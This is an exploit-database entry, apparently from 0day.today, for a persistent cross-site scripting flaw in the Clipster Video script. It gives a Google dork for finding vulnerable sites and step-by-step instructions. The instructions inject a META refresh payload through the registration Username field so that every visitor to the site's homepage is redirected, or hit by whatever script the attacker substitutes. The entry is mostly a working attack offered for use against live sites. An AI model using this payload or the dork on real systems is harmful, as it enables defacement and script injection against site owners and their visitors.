id: 19346
date: 09/06/2012
title: Clipster Video Persistent XSS Vulnerability
author: DaOne
cves: 

##########################################
[~] Exploit Title: Clipster Video Persistent XSS Vulnerability
[~] Author: DaOne
[~] Price: $24
[~] Software Link: http://www.clipsterscript.com/
[~] Google Dork: "Powered by ClipsterScript.com"
##########################################

[#] How to exploit:

1-go to : http://site.com/login.php?action=Register
2-Put in the Username field the XSS Code => Example:<META http-equiv="refresh" content="0;URL=http://www.google.com">
3-Put anything in the other field [Password & E-mail] etc...
4-Now anyone go there : http://site.com/ will redirected to google.com OR exploit your XSS Code.



##########################################
[*] Contact me
 www.facebook.com/LibyanCA2
##########################################



#  0day.today [2023-03-26]  #